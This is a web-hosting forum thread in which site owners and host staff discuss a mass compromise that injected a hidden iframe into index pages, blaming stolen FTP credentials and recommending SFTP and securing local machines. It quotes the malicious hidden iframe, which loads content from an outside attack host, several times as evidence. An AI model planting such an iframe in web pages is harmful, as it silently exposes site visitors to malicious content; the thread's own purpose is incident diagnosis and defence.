All Sites Hacked - Iframe Added

[Emase]

We have had the following code added to all of our sites:

<iframe width=”125“ height=”125“ style=”visibility: hidden;“ src=”http://a3l.ru:8080/ts/in.cgi?pepsi85“>

It appears to have been added to all index files across all sites. I've manually removed it from all the important sites, but what caused this problem and how do I stop it happening again?

I'm guessing this is some kind of trojan horse? Has anybody else here been affected by this? I have seen posts online over the last 24 hours from other people who have been affected.

Any help much appreciated,
Mike

[Emase]

When I scan for trojans I get:

Appears Clean


/dev/stderr


Scanning for Trojan Horses.....

Possible Trojan - /usr/bin/cpan
Possible Trojan - /usr/bin/instmodsh
Possible Trojan - /usr/bin/prove
Possible Trojan - /usr/bin/pstruct
Possible Trojan - /usr/lib/python2.4/site-packages/libxml2mod.la
Possible Trojan - /usr/lib/python2.4/site-packages/libxml2mod.so
Possible Trojan - /usr/bin/gdlib-config
Possible Trojan - /usr/bin/xmlcatalog
Possible Trojan - /usr/bin/xmllint
Possible Trojan - /usr/sbin/antirelayd
Possible Trojan - /usr/bin/xml2-config
Possible Trojan - /usr/sbin/pureauth
Possible Trojan - /etc/cron.daily/logrotate
Possible Trojan - /usr/bin/annotate
Possible Trojan - /usr/bin/gd2togif
Possible Trojan - /usr/bin/gdcmpgif
Possible Trojan - /usr/bin/giftogd2
Possible Trojan - /usr/lib/libgd.so.2.0.0
18 POSSIBLE Trojans Detected

[eukSam]

Quote:

Originally Posted by Emase

We have had the following code added to all of our sites:

<iframe width=”125“ height=”125“ style=”visibility: hidden;“ src=”http://a3l.ru:8080/ts/in.cgi?pepsi85“>

It appears to have been added to all index files across all sites. I've manually removed it from all the important sites, but what caused this problem and how do I stop it happening again?

I'm guessing this is some kind of trojan horse? Has anybody else here been affected by this? I have seen posts online over the last 24 hours from other people who have been affected.

Any help much appreciated,
Mike

Generally these types of iframe injections are done through ftp. You can check the ftp logs on your vps at /var/log/messages. It is recommened to keep strong password for your accounts & if possible, frequently change the passwords.

Feel free to open a ticket on our helpdesk regarding this issue.

[eUKhost.com]

Hi Mike,

We have disabled FTP access of main cpanel user on our shared and reseller hosting servers due to same problem. We have mod_security and some vulnerable PHP functions disabled on our servers. These 3 things are really important for security of servers.

These b*lls**t marketing companies use these injections for promotion of their websites, but there is no way to stop them. Last time I had screwed one Marketing company that tried to inject websites of our shared hosting customers, but taking that route everytime is quite impossible.

You should open a ticket for our VPS Team and ask them to implement these 3 security settings on your VPS.

[BinaryReason]

Hi, this page comes up first when you search for:

PHP Code:

http//a3l.ru:8080/ts/in.cgi?pepsi85 


so I figured I'll add what I found about this hack here for others to see. If you have more information about this, please register here and post (like I did).

First of all - this is a hack. It's done through somebody stealing your ftp credentials, then logging onto your site, searching for index.html and index.php files, and injecting the following code into it:

PHP Code:

<iframe src="http://a3l.ru:8080/ts/in.cgi?pepsi85" width=125 height=125 style="visibility: hidden"></iframe> 


I had it happen to 3 websites I own. When browsing through ftp logs, I noticed somebody logging in with my user name and password, and getting it right the first time, so it wasn't a brute force attack. Also, each of my websites had different ftp username and password, which made it possible for me to find the culprit - I had all my ftp usernames, and passwords stored in FileZilla FTP client's site manager.

After a bit of research, I found out that FileZilla doesn't encrypt the passwords when they're stored, so that's one way somebody could get to them, and then use one of the password recovery programs which can be found freely online.

A more likely way however, is a trojan which installs itself on your computer and sniffs ftp packets, extracting passwords that way.

That means that no matter what ftp client you are using, your passwords will get stolen again, unless you get rid of the trojan. I am still in the process of trying to track it down on my computers.

For now, I would suggest you change your ftp passwords, and check all your index.html/ftp files for modification date, to make sure nobody added invisible iframes to them.

Here's more info on the packet sniffing trojan:

PHP Code:

http://www.google.com/support/forum/p/Google+Analytics/thread?tid=1f6452112c01bb78&hl=en 


[eukSam]

Quote:

After a bit of research, I found out that FileZilla doesn't encrypt the passwords when they're stored, so that's one way somebody could get to them, and then use one of the password recovery programs which can be found freely online.

Its not the Filezilla only. The FTP protocol itself transmits plain password. FTP, though efficient for transferring files, lacks any significant security features. The username, password, and file(s) are sent across the network unencrypted (i.e., in plaintext).

[BinaryReason]

Quote:

Originally Posted by eukSam

Its not the Filezilla only. The FTP protocol itself transmits plain password. FTP, though efficient for transferring files, lacks any significant security features. The username, password, and file(s) are sent across the network unencrypted (i.e., in plaintext).

I was talking about the storage method of passwords on your local machine and not actual protocol itself (which I also mentioned).
A quick search of Filezilla password recovery, will show plenty of tools that simply extract that data.

Though as I said, the scope of these attacks, suggests a network sniffing trojan, that extracts the passwords.

[eUKhost.com]

Quote:

Originally Posted by BinaryReason

I was talking about the storage method of passwords on your local machine and not actual protocol itself (which I also mentioned).
A quick search of Filezilla password recovery, will show plenty of tools that simply extract that data.

Though as I said, the scope of these attacks, suggests a network sniffing trojan, that extracts the passwords.

You are absolutely right with your investigation.

FileZilla and older versions of other FTP softwares like WS_FTP_Pro have this problem. One should never store FTP credentials in a FTP software.

A notepad would be safer option to store your passwords, never store your FTP login credentials in a FTP software.

[mitchell]

I guess this is one big incentive to start using SFTP instead of FTP for file transfers. These kind of attacks aren't new — people have known for years about FTP's vulnerabilities — which is one reason why a more secure alternative like SFTP was created.

Um... I do hope that eUKhost supports SFTP?

[BinaryReason]

Quote:

Originally Posted by mitchell

I guess this is one big incentive to start using SFTP instead of FTP for file transfers. These kind of attacks aren't new — people have known for years about FTP's vulnerabilities — which is one reason why a more secure alternative like SFTP was created.

Um... I do hope that eUKhost supports SFTP?

Amen to that. I just deleted Filezilla off all my computers, no more FTP clients for me. Am looking into SFTP right now.

[eukSam]

Hello,


SFTP will be a good choice. SFTP is supported on all our linux vps & it use the same port of SSH.

[GalaxyMan]

I would actually focus more on securing your computer rather than switching FTP programs as that Trojan could have easily extracted more than just FTP passwords, a keylogger for instance could grant someone access to your PayPal account, hosting account and so on, so it's better to secure your computer first and then take further precautionary procedures.

[cranzi]

When I see hackers breaking into things on shared servers, dedicated servers, vps, anything it really makes me wonder if they are even making the money for all the crap they are doing (wasting other peoples time and money) for this stuff. I can not think of the number of iframe injection issues I have read on web master forums.

[eUKShane]

Hello,

Making money is not the only thing for them. Basically, they think it's a game. They don't realize the impact. They do this for status, for fun, for vengeance, For guilt or for nothing.

Just like bank robbery, it looks cool to be in a gang, have an identity and get recognition for a skill. Hacking is a game to prove how smart you are. The more defenses, anti-viral, anti-spyware and firewalls you can destroy the smarter you are. Hackers sometimes break in to fix systems which users forget to repair. They also alert users to security holes in their system. They also can repair systems from a far which other hackers have destroyed.

Sometimes, they hack without any purpose, if they join a gang to see what it's like……

Unfortunately, hacking for good causes is rare

But, we have to find out a solution for every problem. Don’t forget to keep backup of your data all the time

Hackers hack for a reason. it's mostly psychological.

[eUK-Martin]

Quote:

Originally Posted by cranzi

When I see hackers breaking into things on shared servers, dedicated servers, vps, anything it really makes me wonder if they are even making the money for all the crap they are doing (wasting other peoples time and money) for this stuff. I can not think of the number of iframe injection issues I have read on web master forums.

Actually, the concept of hacking has been completely misunderstood today, a person who gets in to your machine without authentication or permission is a cracker and not a hacker. Hackers are meant to find security vulnerabilities in an application and try to fix them, contribute towards the good faith of community. Good hackers like Eric Steven Raymond do exist today who work for good of this world.

What Shane said is very true, it is just to show your skills and get a position in your gang.

[bytemaster]

Explain how switching FTP programs will prevent you from uploading nasties, if you're just not aware of them?

As already pointed out concentrate on securing your computer.

[sihost]

I was hacked today...twice in a row on semi dedicated VPS.
The system was restored and they hacked it again through the same root access.

It has caused me so much hassle it's unbelievable. These idiots seem to get pleasure out of ruining other people's reputation and wasting our time. I've got clients screaming at me because their 'emails down again'

I traced my hackers ip address to Romania, if he was nearer and I could get hold of him I'd break his/her neck. Its hard enough keeping a business going and successful in the current economic climate as it is without some idiot probably living off the state hacking me twice in a row!

[Paul_S]

If you block IP's from Romania won't that stop FTP from there too?

[sihost]

Hi Paul,
The firewall blocks specific ip addresses which try more than x amount of times to get into the server.
This doesn't affect genuine ftp uses from any particular country who SHOULD be accessing the server